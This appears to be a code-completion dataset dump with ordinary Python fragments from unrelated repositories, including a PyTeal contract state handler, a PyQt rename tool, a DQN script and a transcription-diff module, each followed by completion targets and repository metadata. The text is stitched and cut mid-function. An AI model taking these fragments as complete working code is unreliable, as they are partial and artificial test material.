return App.globalPut(KEY_MBR_FUND, App.globalGet(KEY_MBR_FUND) + mbr_fund)
@staticmethod
def get_liquidation_factors() -> Expr:
"""Gets the object representing the liquidation factors"""
return App.globalGet(KEY_LIQUIDATION_FACTORS)
@staticmethod
def set_liquidation_factors(factors) -> Expr:
"""Sets the global liquidation factors"""
factors_size = abi.make(LiquidationFactors).type_spec().byte_length_static()
return Seq(
Assert(Len(factors) == Int(factors_size)),
App.globalPut(KEY_LIQUIDATION_FACTORS, factors),
)
@staticmethod
@ABIReturnSubroutine
def get_instrument(
| """Implements core contract global state handler"""
KEY_INIT_TIMESTAMP = Bytes("t")
KEY_INSTRUMENT_COUNT = Bytes("c")
KEY_MBR_FUND = Bytes("m")
KEY_PRICECASTER_ID = Bytes("p")
KEY_WORMHOLE_BRIDGE_ID = Bytes("b")
KEY_LIQUIDATION_FACTORS = Bytes("l")
KEY_SIGNATURE_VALIDATOR = Bytes("s")
KEY_WITHDRAW_BUFFER = Bytes("w")
KEY_QUANT_ADDRESS = Bytes("q")
KEY_OPERATOR_ADDRESS = Bytes("o")
KEY_FEE_TARGET = Bytes("f")
class GlobalStateHandler:
"""Global state handler"""
instrument_size = abi.make(InstrumentListElement).type_spec().byte_length_static()
max_instrument_count = 80
# NOTE: Most of these methods are not subroutines for performance reasons
@staticmethod
def initialize() -> Expr:
"""Initialize the global blob"""
return Pop(App.box_create(Bytes("i"), Int(GlobalStateHandler.instrument_size * GlobalStateHandler.max_instrument_count)))
@staticmethod
def get_relative_timestamp() -> Expr:
"""Gets the relative timestamp"""
return Global.latest_timestamp() - App.globalGet(KEY_INIT_TIMESTAMP)
@staticmethod
def set_init_timestamp() -> Expr:
"""Sets the initial timestamp"""
return App.globalPut(KEY_INIT_TIMESTAMP, Global.latest_timestamp())
@staticmethod
def get_instrument_count() -> Expr:
"""Gets the number of instruments"""
return App.globalGet(KEY_INSTRUMENT_COUNT)
@staticmethod
def set_instrument_count(instrument_count) -> Expr:
"""Sets the number of instruments"""
return App.globalPut(KEY_INSTRUMENT_COUNT, instrument_count)
@staticmethod
def get_pricecaster_id() -> Expr:
"""Gets the App id of the pricecaster"""
return App.globalGet(KEY_PRICECASTER_ID)
@staticmethod
def set_pricecaster_id(pricecaster_id) -> Expr:
"""Sets the App id of the pricecaster"""
return App.globalPut(KEY_PRICECASTER_ID, Btoi(pricecaster_id))
@staticmethod
def get_wormhole_bridge_id() -> Expr:
"""Gets the App id of the wormhole bridge"""
return App.globalGet(KEY_WORMHOLE_BRIDGE_ID)
@staticmethod
def set_wormhole_bridge_id(wormhole_bridge_id) -> Expr:
"""Sets the App id of the wormhole bridge"""
return App.globalPut(KEY_WORMHOLE_BRIDGE_ID, Btoi(wormhole_bridge_id))
@staticmethod
@ABIReturnSubroutine
def set_address(key, address) -> Expr:
"""Sets an address in the global storage checking the length"""
return Seq(
Assert(Len(address) == Int(ADDRESS_SIZE)),
App.globalPut(key, address)
)
@staticmethod
def get_signature_validator() -> Expr:
"""Checks the address of the signature validator"""
return App.globalGet(KEY_SIGNATURE_VALIDATOR)
@staticmethod
def set_signature_validator(signature_validator) -> Expr:
"""Sets the address of the signature validator"""
return cast(Expr, GlobalStateHandler.set_address(KEY_SIGNATURE_VALIDATOR, signature_validator))
@staticmethod
def get_operator_address() -> Expr:
"""Gets the address of the operator"""
return App.globalGet(KEY_OPERATOR_ADDRESS)
@staticmethod
def set_operator_address(operator_address) -> Expr:
"""Sets the address of the operator"""
return cast(Expr, GlobalStateHandler.set_address(KEY_OPERATOR_ADDRESS, operator_address))
@staticmethod
def get_quant_address() -> Expr:
"""Gets the quant address"""
return App.globalGet(KEY_QUANT_ADDRESS)
@staticmethod
def set_quant_address(quant_address) -> Expr:
"""Sets the quant address"""
return cast(Expr, GlobalStateHandler.set_address(KEY_QUANT_ADDRESS, quant_address))
@staticmethod
def get_fee_target() -> Expr:
"""Gets the fee target address"""
return App.globalGet(KEY_FEE_TARGET)
@staticmethod
def set_fee_target(fee_target_address) -> Expr:
"""Sets the fee target address"""
return cast(Expr, GlobalStateHandler.set_address(KEY_FEE_TARGET, fee_target_address))
@staticmethod
def get_withdraw_buffer() -> Expr:
"""Gets the withdraw buffer address"""
return App.globalGet(KEY_WITHDRAW_BUFFER)
@staticmethod
def set_withdraw_buffer(withdraw_buffer) -> Expr:
"""Sets the withdraw buffer address"""
return cast(Expr, GlobalStateHandler.set_address(KEY_WITHDRAW_BUFFER, withdraw_buffer))
@staticmethod
@ABIReturnSubroutine
def ensure_mbr_fund() -> Expr:
"""Ensures the current mbr is lower than the fund"""
return Assert(MinBalance(Global.current_application_address()) <= App.globalGet(KEY_MBR_FUND))
@staticmethod
def add_mbr_fund(mbr_fund) -> Expr:
"""Increments the mbr fund amount by an amount"""
return App.globalPut(KEY_MBR_FUND, App.globalGet(KEY_MBR_FUND) + mbr_fund)
@staticmethod
def get_liquidation_factors() -> Expr:
"""Gets the object representing the liquidation factors"""
return App.globalGet(KEY_LIQUIDATION_FACTORS)
@staticmethod
def set_liquidation_factors(factors) -> Expr:
"""Sets the global liquidation factors"""
factors_size = abi.make(LiquidationFactors).type_spec().byte_length_static()
return Seq(
Assert(Len(factors) == Int(factors_size)),
App.globalPut(KEY_LIQUIDATION_FACTORS, factors),
)
@staticmethod
@ABIReturnSubroutine
def get_instrument( | instrument_id: InstrumentId, | 0 | 2023-11-17 20:54:15+00:00 | 2k |
gunderson-dettmer/CE2OCF | CE2OCF/ocf/mocks/stockholders.py | [
{
"identifier": "fake_phone_number",
"path": "CE2OCF/ocf/mocks/company.py",
"snippet": "def fake_phone_number() -> str:\n \"\"\"\n Generates a valid US phone number with the international calling code.\n\n The format is +1 (XXX) XXX-XXXX, with the following rules for the area code:\n 1. The ... | import random
import uuid
from faker import Faker
from CE2OCF.ocf.mocks.company import fake_phone_number
from CE2OCF.types.enums import (
DoubleTriggerTypesEnum,
PaidWithOptionsEnum,
SingleTriggerTypesEnum,
VestingTypesEnum,
)
from CE2OCF.types.models import Stockholder | 1,487 |
fake = Faker()
def sum_shares(stockholder_list: list[Stockholder]) -> tuple[int, int]:
total_FFPreferredShares = 0
total_Shares = 0
for stockholder in stockholder_list:
if stockholder.FFPreferredShares is not None:
total_FFPreferredShares += stockholder.FFPreferredShares
if stockholder.Shares is not None:
total_Shares += stockholder.Shares # if Shares are floats, replace with `float(stockholder.Shares)`
return total_FFPreferredShares, total_Shares
def mock_stockholder() -> Stockholder:
return Stockholder(
id=uuid.uuid4().__str__(),
|
fake = Faker()
def sum_shares(stockholder_list: list[Stockholder]) -> tuple[int, int]:
total_FFPreferredShares = 0
total_Shares = 0
for stockholder in stockholder_list:
if stockholder.FFPreferredShares is not None:
total_FFPreferredShares += stockholder.FFPreferredShares
if stockholder.Shares is not None:
total_Shares += stockholder.Shares # if Shares are floats, replace with `float(stockholder.Shares)`
return total_FFPreferredShares, total_Shares
def mock_stockholder() -> Stockholder:
return Stockholder(
id=uuid.uuid4().__str__(), | DoubleTrigger=random.choice(list(DoubleTriggerTypesEnum)), | 1 | 2023-11-13 15:50:53+00:00 | 2k |
Hellohistory/EbookDataRename.py | main.py | [
{
"identifier": "queryDatabaseForFileNames",
"path": "model/database_handler.py",
"snippet": "def queryDatabaseForFileNames(db_folder_path, folder_path, tableWidget):\n try:\n db_files = get_files_from_directory(db_folder_path, recursive=True)\n db_files = [f for f in db_files if f.ends... | import sys
from PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QVBoxLayout, QHBoxLayout,
QPushButton, QLineEdit, QProgressBar, QTableWidget,
QRadioButton, QCheckBox, QFileDialog, QTableWidgetItem)
from PyQt5.QtCore import QSize
from opencc import OpenCC
from model.database_handler import queryDatabaseForFileNames
from model.file_handler import get_files_from_directory
from model.rename_handler import startRenamingFiles | 1,131 |
class MainGUI(QMainWindow):
def __init__(self):
super().__init__()
self.cc = OpenCC('s2t')
self.original_names = {}
self.initUI()
def applyTraditionalSimplifiedConversion(self):
total_rows = self.tableWidget.rowCount()
for row in range(total_rows):
original_text_item = self.tableWidget.item(row, 1)
if original_text_item:
if self.traditionalSimplifiedCheckBox.isChecked():
if row not in self.original_names:
self.original_names[row] = original_text_item.text()
converted_text = self.cc.convert(self.original_names[row])
self.tableWidget.setItem(row, 1, QTableWidgetItem(converted_text))
else:
if row in self.original_names:
self.tableWidget.setItem(row, 1, QTableWidgetItem(self.original_names[row]))
def initUI(self):
self.setWindowTitle('EbookDataRename V0.0.1')
self.setMinimumSize(QSize(800, 600))
centralWidget = QWidget(self)
self.setCentralWidget(centralWidget)
mainLayout = QVBoxLayout(centralWidget)
self.setupLayout(mainLayout)
self.applyMaterialDesignStyle()
def initiateDatabaseQuery(self):
db_path = self.local_db_lineedit.text()
folder_path = self.targetFolderLineEdit.text()
|
class MainGUI(QMainWindow):
def __init__(self):
super().__init__()
self.cc = OpenCC('s2t')
self.original_names = {}
self.initUI()
def applyTraditionalSimplifiedConversion(self):
total_rows = self.tableWidget.rowCount()
for row in range(total_rows):
original_text_item = self.tableWidget.item(row, 1)
if original_text_item:
if self.traditionalSimplifiedCheckBox.isChecked():
if row not in self.original_names:
self.original_names[row] = original_text_item.text()
converted_text = self.cc.convert(self.original_names[row])
self.tableWidget.setItem(row, 1, QTableWidgetItem(converted_text))
else:
if row in self.original_names:
self.tableWidget.setItem(row, 1, QTableWidgetItem(self.original_names[row]))
def initUI(self):
self.setWindowTitle('EbookDataRename V0.0.1')
self.setMinimumSize(QSize(800, 600))
centralWidget = QWidget(self)
self.setCentralWidget(centralWidget)
mainLayout = QVBoxLayout(centralWidget)
self.setupLayout(mainLayout)
self.applyMaterialDesignStyle()
def initiateDatabaseQuery(self):
db_path = self.local_db_lineedit.text()
folder_path = self.targetFolderLineEdit.text() | queryDatabaseForFileNames(db_path, folder_path, self.tableWidget) | 0 | 2023-11-10 19:42:58+00:00 | 2k |
fleet-ai/code-pilot | scripts.py | [
{
"identifier": "batch",
"path": "utils/utils.py",
"snippet": "def batch(iterable, n=1):\n l = len(iterable)\n for ndx in range(0, l, n):\n yield iterable[ndx : min(ndx + n, l)]"
},
{
"identifier": "INDEX_NAME",
"path": "constants.py",
"snippet": "INDEX_NAME = \"\" # TODO a... | import os
import argparse
import pinecone
from dotenv import load_dotenv
from context import download_embeddings
from utils.utils import batch
from constants import (
INDEX_NAME,
INDEX_ENVIRONMENT,
NAMESPACE,
PATH_TO_SRC_CODE,
)
from code_indexer import CodeIndexer | 1,525 |
load_dotenv()
PINECONE_API_KEY = os.getenv("PINECONE_API_KEY")
pinecone.init(api_key=PINECONE_API_KEY, environment=INDEX_ENVIRONMENT)
index = pinecone.Index(INDEX_NAME)
def read_and_upsert(library_name):
df = download_embeddings(library_name)
def convert_row_to_dict(row):
return {
"id": row["id"],
"values": [float(value) for value in row["dense_embeddings"]],
"sparse_values": dict(row["sparse_values"]),
"metadata": {**dict(row["metadata"]), "type": "documentation"},
}
df["dict"] = df.apply(convert_row_to_dict, axis=1)
vectors = df["dict"].tolist()
vec_batches = list(batch(vectors, 100))
for idx, vec_batch in enumerate(vec_batches):
print(f"Upserting batch {idx}/{len(vec_batches)}...")
index.upsert(vectors=vec_batch, namespace=NAMESPACE)
print("Finished upserting")
def read_and_upsert_source_code():
|
load_dotenv()
PINECONE_API_KEY = os.getenv("PINECONE_API_KEY")
pinecone.init(api_key=PINECONE_API_KEY, environment=INDEX_ENVIRONMENT)
index = pinecone.Index(INDEX_NAME)
def read_and_upsert(library_name):
df = download_embeddings(library_name)
def convert_row_to_dict(row):
return {
"id": row["id"],
"values": [float(value) for value in row["dense_embeddings"]],
"sparse_values": dict(row["sparse_values"]),
"metadata": {**dict(row["metadata"]), "type": "documentation"},
}
df["dict"] = df.apply(convert_row_to_dict, axis=1)
vectors = df["dict"].tolist()
vec_batches = list(batch(vectors, 100))
for idx, vec_batch in enumerate(vec_batches):
print(f"Upserting batch {idx}/{len(vec_batches)}...")
index.upsert(vectors=vec_batch, namespace=NAMESPACE)
print("Finished upserting")
def read_and_upsert_source_code(): | _ = CodeIndexer(src_dir=PATH_TO_SRC_CODE) | 4 | 2023-11-14 01:45:16+00:00 | 2k |
bithuanglq/APF_RL | DQN_variant.py | [
{
"identifier": "RelativePosition",
"path": "gym_examples/wrappers/relative_position.py",
"snippet": "class RelativePosition(gym.ObservationWrapper):\n def __init__(self, env):\n super().__init__(env)\n self.observation_space = spaces.Box(shape=(2+25*6,), low=-np.inf, high=np.inf)\n\n\n... | import argparse
import os
import random
import time
import gym
import numpy as np
import tensorflow as tf
import tensorlayer as tl
from tqdm import tqdm
from gym_examples.wrappers import RelativePosition
from prioritized_memory import Memory | 1,008 | ''' 调试日志
1. 适配版本
https://medium.com/mlearning-ai/how-to-install-tensorflow-2-x-with-cuda-and-cudnn-on-ubuntu-20-04-lts-b73c209d8e88
2. 要用save_npz_dict 保存模型而不是 save_npz; 加载时同理
3. 用 APF 代替部分随机探索效果要好很多
4. 加入了PER: (https://blog.csdn.net/abcdefg90876/article/details/106270925), 也可以只用Original Replay Buffer
5. 超参数参考模块: hyper parameters
'''
'''
GridWorld-v0:
@Action -- 0 right, 1 up, 2 left, 3 down
@Observation -- {[x1, y1], [x2, y2], 25 vector(6,)}, agent_loc, target_loc and surrounding states.
@Info -- distance between agent and target
'''
parser = argparse.ArgumentParser()
parser.add_argument('--mode', help='train or test', default='train')
parser.add_argument(
'--save_path', default='dqn_variants', help='folder to save if mode == train else model path,'
'qnet will be saved once target net update'
)
parser.add_argument('--seed', help='random seed', type=int, default=0)
parser.add_argument('--noisy_scale', type=float, default=1e-2)
parser.add_argument('--disable_double', action='store_false', default=True)
parser.add_argument('--disable_dueling', action='store_false', default=False)
args = parser.parse_args()
if args.mode == 'train':
os.makedirs(args.save_path, exist_ok=True)
random.seed(args.seed)
np.random.seed(args.seed)
tf.random.set_seed(args.seed) # reproducible
noise_scale = args.noisy_scale
double = not args.disable_double
dueling = not args.disable_dueling
env = gym.make('gym_examples/GridWorld-v0', render_mode='human')
| ''' 调试日志
1. 适配版本
https://medium.com/mlearning-ai/how-to-install-tensorflow-2-x-with-cuda-and-cudnn-on-ubuntu-20-04-lts-b73c209d8e88
2. 要用save_npz_dict 保存模型而不是 save_npz; 加载时同理
3. 用 APF 代替部分随机探索效果要好很多
4. 加入了PER: (https://blog.csdn.net/abcdefg90876/article/details/106270925), 也可以只用Original Replay Buffer
5. 超参数参考模块: hyper parameters
'''
'''
GridWorld-v0:
@Action -- 0 right, 1 up, 2 left, 3 down
@Observation -- {[x1, y1], [x2, y2], 25 vector(6,)}, agent_loc, target_loc and surrounding states.
@Info -- distance between agent and target
'''
parser = argparse.ArgumentParser()
parser.add_argument('--mode', help='train or test', default='train')
parser.add_argument(
'--save_path', default='dqn_variants', help='folder to save if mode == train else model path,'
'qnet will be saved once target net update'
)
parser.add_argument('--seed', help='random seed', type=int, default=0)
parser.add_argument('--noisy_scale', type=float, default=1e-2)
parser.add_argument('--disable_double', action='store_false', default=True)
parser.add_argument('--disable_dueling', action='store_false', default=False)
args = parser.parse_args()
if args.mode == 'train':
os.makedirs(args.save_path, exist_ok=True)
random.seed(args.seed)
np.random.seed(args.seed)
tf.random.set_seed(args.seed) # reproducible
noise_scale = args.noisy_scale
double = not args.disable_double
dueling = not args.disable_dueling
env = gym.make('gym_examples/GridWorld-v0', render_mode='human') | env = RelativePosition(env) # refer to gym_examples/wrappers/relative_position.py, observation space has changed! | 0 | 2023-11-10 02:45:37+00:00 | 2k |
ehennenfent/live_illustrate | live_illustrate/summarize.py | [
{
"identifier": "AsyncThread",
"path": "live_illustrate/util.py",
"snippet": "class AsyncThread:\n \"\"\"Generic thread that has a work queue and a callback to run on the result\"\"\"\n\n SLEEP_TIME = 0.25\n MAX_ERRORS = 5\n\n def __init__(self, logger_name=\"AsyncThread\") -> None:\n ... | from datetime import datetime
from openai import OpenAI
from .util import AsyncThread, Summary, Transcription, num_tokens_from_string | 697 |
SYSTEM_PROMPT = "You are a helpful assistant that describes scenes to an artist who wants to draw them. \
You will be given several lines of dialogue that contain details about the physical surroundings of the characters. \
Your job is to summarize the details of the scene in a bulleted list containing 4-7 bullet points. \
If there is more than one scene described by the dialog, summarize only the most recent one. \
Remember to be concise and not include details that cannot be seen." # Not so good about this last bit, eh?
class TextSummarizer(AsyncThread):
def __init__(self, model: str) -> None:
super().__init__("TextSummarizer")
self.openai_client: OpenAI = OpenAI()
self.model: str = model
def work(self, transcription: Transcription) -> Summary | None:
"""Sends the big buffer of provided text to ChatGPT, returns bullets describing the setting"""
text = transcription.transcription
|
SYSTEM_PROMPT = "You are a helpful assistant that describes scenes to an artist who wants to draw them. \
You will be given several lines of dialogue that contain details about the physical surroundings of the characters. \
Your job is to summarize the details of the scene in a bulleted list containing 4-7 bullet points. \
If there is more than one scene described by the dialog, summarize only the most recent one. \
Remember to be concise and not include details that cannot be seen." # Not so good about this last bit, eh?
class TextSummarizer(AsyncThread):
def __init__(self, model: str) -> None:
super().__init__("TextSummarizer")
self.openai_client: OpenAI = OpenAI()
self.model: str = model
def work(self, transcription: Transcription) -> Summary | None:
"""Sends the big buffer of provided text to ChatGPT, returns bullets describing the setting"""
text = transcription.transcription | if (token_count := num_tokens_from_string(text)) == 0: | 3 | 2023-11-18 05:42:54+00:00 | 2k |
cyberark/ark-sdk-python | ark_sdk_python/models/services/dpa/policies/vm/ark_dpa_vm_authorization_rule.py | [
{
"identifier": "ArkProtocolType",
"path": "ark_sdk_python/models/common/ark_protocol_type.py",
"snippet": "class ArkProtocolType(str, MultiValueEnum):\n SSH = 'ssh', 'SSH'\n SCP = 'scp', 'SCP'\n SFTP = 'sftp', 'SFTP'\n RDP = 'rdp', 'RDP'\n CLI = 'cli', 'CLI'\n CONSOLE = 'console', 'Co... | from pydantic import Field, validator
from ark_sdk_python.models.common import ArkProtocolType
from ark_sdk_python.models.common.ark_workspace_type import ArkWorkspaceType
from ark_sdk_python.models.services.dpa.policies.common.ark_dpa_base_authorization_rule import ArkDPABaseAuthorizationRule
from ark_sdk_python.models.services.dpa.policies.common.ark_dpa_base_connection_information import ArkDPABaseConnectionInformation
from ark_sdk_python.models.services.dpa.policies.vm.ark_dpa_vm_connection_data import ArkDPAVMProvidersConnectionDict | 957 |
class ArkDPAVMConnectionInformation(ArkDPABaseConnectionInformation):
connect_as: ArkDPAVMProvidersConnectionDict = Field(description='In which fashion the connection is made')
# pylint: disable=no-self-use,no-self-argument
@validator('connect_as')
def validate_connect_as(cls, val):
for k, v in val.items():
|
class ArkDPAVMConnectionInformation(ArkDPABaseConnectionInformation):
connect_as: ArkDPAVMProvidersConnectionDict = Field(description='In which fashion the connection is made')
# pylint: disable=no-self-use,no-self-argument
@validator('connect_as')
def validate_connect_as(cls, val):
for k, v in val.items(): | if ArkWorkspaceType(k) not in [ArkWorkspaceType.AWS, ArkWorkspaceType.AZURE, ArkWorkspaceType.GCP, ArkWorkspaceType.ONPREM]: | 1 | 2023-11-13 09:24:31+00:00 | 2k |
Infineon/pharaoh-dev | src/pharaoh/templating/second_level/template_env.py | [
{
"identifier": "env_filters",
"path": "src/pharaoh/templating/second_level/env_filters.py",
"snippet": "DEFAULT = object()\ndef required(value):\ndef rep(value) -> str:\ndef or_default(value, default):\ndef oc_resolve(value: omegaconf.DictConfig):\ndef oc_get(cfg: omegaconf.DictConfig, key, default=DEF... | import copy
import functools
import os
import pprint
import shutil
import uuid
import jinja2
import omegaconf
import pharaoh.project
from functools import partial
from pathlib import Path
from types import ModuleType
from typing import TYPE_CHECKING, Callable
from jinja2_git import GitExtension
from pharaoh.log import log
from pharaoh.util.contextlib_chdir import chdir
from .env_filters import env_filters
from .env_globals import env_globals
from .env_tests import env_tests
from .util import asset_rel_path_from_build, asset_rel_path_from_project
from collections.abc import Iterator
from sphinx.config import Config
from pharaoh.sphinx_app import PharaohSphinx
from pharaoh.plugins.plugin_manager import PM | 1,113 | from __future__ import annotations
if TYPE_CHECKING:
class PharaohFileSystemLoader(jinja2.loaders.FileSystemLoader):
def get_source(self, environment: jinja2.Environment, template: str) -> tuple[str, str, Callable[[], bool]]:
# Overwrite to support absolute filenames as well as relative ones that have to be looked up in the search paths
for searchpath in self.searchpath:
if "<>" in template: # See PharaohTemplateEnv.join_path
parent, template_ = template.rsplit("<>", 1)
template_path = Path(parent) / template_
if template_path.is_absolute() and template_path.exists():
filename = template_path.as_posix()
else:
pieces = jinja2.loaders.split_template_path(template_)
filename = jinja2.loaders.posixpath.join(searchpath, *pieces)
else:
pieces = jinja2.loaders.split_template_path(template)
filename = jinja2.loaders.posixpath.join(searchpath, *pieces)
# Original code starts from here
f = jinja2.loaders.open_if_exists(filename)
if f is None:
continue
try:
contents = f.read().decode(self.encoding)
finally:
f.close()
def up_to_date() -> bool:
return False
# Use normpath to convert Windows altsep to sep.
return contents, os.path.normpath(filename), up_to_date
raise jinja2.TemplateNotFound(template)
class PharaohTemplate(jinja2.Template):
def render(self, *args, **kwargs) -> str:
return super().render(*args, **kwargs)
class PharaohTemplateEnv(jinja2.Environment):
template_class = PharaohTemplate
def __init__(self):
super().__init__(
trim_blocks=True,
lstrip_blocks=True,
keep_trailing_newline=True,
extensions=["jinja2_ansible_filters.AnsibleCoreFiltersExtension"],
)
self.default_context: dict = {
"project": {}, # Project related context
"local": {}, # Discovered content of context files next to the source file
"assets": {}, # Discovered content of asset files registered via register_templating_context function
"config": None, # Content of conf.py (Sphinx Config object)
"user": None, # Content of user given dict "pharaoh_jinja_context" in conf.py
}
self.local_context_file_cache: dict[Path, ModuleType] = {}
self.sphinx_app: PharaohSphinx | None = None
self.globals.update(env_globals)
| from __future__ import annotations
if TYPE_CHECKING:
class PharaohFileSystemLoader(jinja2.loaders.FileSystemLoader):
def get_source(self, environment: jinja2.Environment, template: str) -> tuple[str, str, Callable[[], bool]]:
# Overwrite to support absolute filenames as well as relative ones that have to be looked up in the search paths
for searchpath in self.searchpath:
if "<>" in template: # See PharaohTemplateEnv.join_path
parent, template_ = template.rsplit("<>", 1)
template_path = Path(parent) / template_
if template_path.is_absolute() and template_path.exists():
filename = template_path.as_posix()
else:
pieces = jinja2.loaders.split_template_path(template_)
filename = jinja2.loaders.posixpath.join(searchpath, *pieces)
else:
pieces = jinja2.loaders.split_template_path(template)
filename = jinja2.loaders.posixpath.join(searchpath, *pieces)
# Original code starts from here
f = jinja2.loaders.open_if_exists(filename)
if f is None:
continue
try:
contents = f.read().decode(self.encoding)
finally:
f.close()
def up_to_date() -> bool:
return False
# Use normpath to convert Windows altsep to sep.
return contents, os.path.normpath(filename), up_to_date
raise jinja2.TemplateNotFound(template)
class PharaohTemplate(jinja2.Template):
def render(self, *args, **kwargs) -> str:
return super().render(*args, **kwargs)
class PharaohTemplateEnv(jinja2.Environment):
template_class = PharaohTemplate
def __init__(self):
super().__init__(
trim_blocks=True,
lstrip_blocks=True,
keep_trailing_newline=True,
extensions=["jinja2_ansible_filters.AnsibleCoreFiltersExtension"],
)
self.default_context: dict = {
"project": {}, # Project related context
"local": {}, # Discovered content of context files next to the source file
"assets": {}, # Discovered content of asset files registered via register_templating_context function
"config": None, # Content of conf.py (Sphinx Config object)
"user": None, # Content of user given dict "pharaoh_jinja_context" in conf.py
}
self.local_context_file_cache: dict[Path, ModuleType] = {}
self.sphinx_app: PharaohSphinx | None = None
self.globals.update(env_globals) | self.filters.update(env_filters) | 0 | 2023-11-10 11:33:02+00:00 | 2k |
CorentinJ/transcription-diff | transcription_diff/text_diff.py | [
{
"identifier": "normalize_text",
"path": "transcription_diff/text_normalization.py",
"snippet": "def normalize_text(raw_text: str, lang_id: str, fault_tolerant=False) -> Tuple[str, SliceMap]:\n \"\"\"\n :param fault_tolerant: issues arising in cleaning operations will not raise an exception if Tr... | import logging
import numpy as np
from dataclasses import dataclass
from pathlib import Path
from typing import List, Iterable, overload, Union
from minineedle import needle
from transcription_diff.text_normalization import normalize_text
from transcription_diff.whisper_asr import whisper_asr
from colorama import Fore as colors | 1,565 | @dataclass
class TextDiffRegion:
reference_text: str
compared_text: str
pronunciation_match: bool
def clean_text_diff(ref_text: str, compared: str) -> List[TextDiffRegion]:
alignment = needle.NeedlemanWunsch(ref_text.split(" "), compared.split(" "))
alignment.align()
# Arrange
regions = []
for ref_word, compared_word in zip(*alignment.get_aligned_sequences()):
regions.append(TextDiffRegion(
ref_word if isinstance(ref_word, str) else "",
compared_word if isinstance(compared_word, str) else "",
pronunciation_match=(ref_word == compared_word)
))
# Re-add the spaces between words, and prefer to add them on identical regions rather than non-identical ones
for text_attr in ("reference_text", "compared_text"):
last_word_region = None
for region in regions:
if not getattr(region, text_attr):
continue
if last_word_region:
if last_word_region.pronunciation_match:
setattr(last_word_region, text_attr, getattr(last_word_region, text_attr) + " ")
else:
setattr(region, text_attr, " " + getattr(region, text_attr))
last_word_region = region
# Compress
new_regions = []
for region in regions:
if new_regions and (new_regions[-1].pronunciation_match == region.pronunciation_match):
new_regions[-1].reference_text += region.reference_text
new_regions[-1].compared_text += region.compared_text
else:
new_regions.append(region)
return new_regions
def text_diff(
reference_texts: Iterable[str], compared_texts: Iterable[str], lang_id: str
) -> List[List[TextDiffRegion]]:
raw_refs, raw_comps = list(reference_texts), list(compared_texts)
# Normalize text down to characters that influence pronunciation only
clean_refs, raw2clean_refs = zip(*[normalize_text(raw_ref, lang_id) for raw_ref in raw_refs])
clean_comps, raw2clean_comps = zip(*[normalize_text(raw_comp, lang_id) for raw_comp in raw_comps])
# Align clean texts and isolate errors
text_diffs = [clean_text_diff(clean_ref, clean_comp) for clean_ref, clean_comp in zip(clean_refs, clean_comps)]
# Bring the regions up to the unnormalized text space
for raw_ref, raw2clean_ref, raw_comp, raw2clean_comp, clean_diff in zip(
raw_refs, raw2clean_refs, raw_comps, raw2clean_comps, text_diffs
):
clean2raw_ref = raw2clean_ref.inverse()
clean2raw_comp = raw2clean_comp.inverse()
clean_ref_pos, clean_comp_pos = 0, 0
raw_ref_pos, raw_comp_pos = 0, 0
for region in clean_diff:
# Use slicemaps to figure out which parts of the unnormalized text this region corresponds to
clean_ref_sli = slice(clean_ref_pos, clean_ref_pos + len(region.reference_text))
clean_comp_sli = slice(clean_comp_pos, clean_comp_pos + len(region.compared_text))
if region is not clean_diff[-1]:
raw_ref_sli = slice(raw_ref_pos, max(clean2raw_ref[clean_ref_sli].stop, raw_ref_pos))
raw_comp_sli = slice(raw_comp_pos, max(clean2raw_comp[clean_comp_sli].stop, raw_comp_pos))
else:
# Ensure we span the entirety of the unnormalized text, slicemaps are not guaranteed to be surjective
# Typical example: a final punctuation that is erased in text normalization.
raw_ref_sli = slice(raw_ref_pos, len(raw_ref))
raw_comp_sli = slice(raw_comp_pos, len(raw_comp))
# Modify the region in place with the unnormalized text
region.reference_text = raw_ref[raw_ref_sli]
region.compared_text = raw_comp[raw_comp_sli]
# Update the positions
clean_ref_pos = clean_ref_sli.stop
clean_comp_pos = clean_comp_sli.stop
raw_ref_pos = raw_ref_sli.stop
raw_comp_pos = raw_comp_sli.stop
return text_diffs
@overload
def transcription_diff(
text: str, wav: np.ndarray, sr, *, audio_lang: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> List[TextDiffRegion]: ...
@overload
def transcription_diff(
texts: List[str], wavs: Iterable[np.ndarray], sr, *, audio_lang: str=None, whisper_model_size=2, custom_words=[],
device="cuda"
) -> List[List[TextDiffRegion]]: ...
@overload
def transcription_diff(
text: str, fpath: Union[str, Path], *, audio_lang: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> List[TextDiffRegion]: ...
@overload
def transcription_diff(
texts: List[str], fpaths: Iterable[Union[str, Path]], *, audio_lang: str=None, whisper_model_size=2,
custom_words=[], device="cuda"
) -> List[List[TextDiffRegion]]: ...
def transcription_diff(
*args, lang_id: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> Union[List[TextDiffRegion], List[List[TextDiffRegion]]]:
# TODO: doc
# Arg parsing
texts, args = args[0], args[1:]
if single := isinstance(texts, str):
texts = [texts]
# Perform ASR
|
logger = logging.getLogger(__name__)
@dataclass
class TextDiffRegion:
reference_text: str
compared_text: str
pronunciation_match: bool
def clean_text_diff(ref_text: str, compared: str) -> List[TextDiffRegion]:
alignment = needle.NeedlemanWunsch(ref_text.split(" "), compared.split(" "))
alignment.align()
# Arrange
regions = []
for ref_word, compared_word in zip(*alignment.get_aligned_sequences()):
regions.append(TextDiffRegion(
ref_word if isinstance(ref_word, str) else "",
compared_word if isinstance(compared_word, str) else "",
pronunciation_match=(ref_word == compared_word)
))
# Re-add the spaces between words, and prefer to add them on identical regions rather than non-identical ones
for text_attr in ("reference_text", "compared_text"):
last_word_region = None
for region in regions:
if not getattr(region, text_attr):
continue
if last_word_region:
if last_word_region.pronunciation_match:
setattr(last_word_region, text_attr, getattr(last_word_region, text_attr) + " ")
else:
setattr(region, text_attr, " " + getattr(region, text_attr))
last_word_region = region
# Compress
new_regions = []
for region in regions:
if new_regions and (new_regions[-1].pronunciation_match == region.pronunciation_match):
new_regions[-1].reference_text += region.reference_text
new_regions[-1].compared_text += region.compared_text
else:
new_regions.append(region)
return new_regions
def text_diff(
reference_texts: Iterable[str], compared_texts: Iterable[str], lang_id: str
) -> List[List[TextDiffRegion]]:
raw_refs, raw_comps = list(reference_texts), list(compared_texts)
# Normalize text down to characters that influence pronunciation only
clean_refs, raw2clean_refs = zip(*[normalize_text(raw_ref, lang_id) for raw_ref in raw_refs])
clean_comps, raw2clean_comps = zip(*[normalize_text(raw_comp, lang_id) for raw_comp in raw_comps])
# Align clean texts and isolate errors
text_diffs = [clean_text_diff(clean_ref, clean_comp) for clean_ref, clean_comp in zip(clean_refs, clean_comps)]
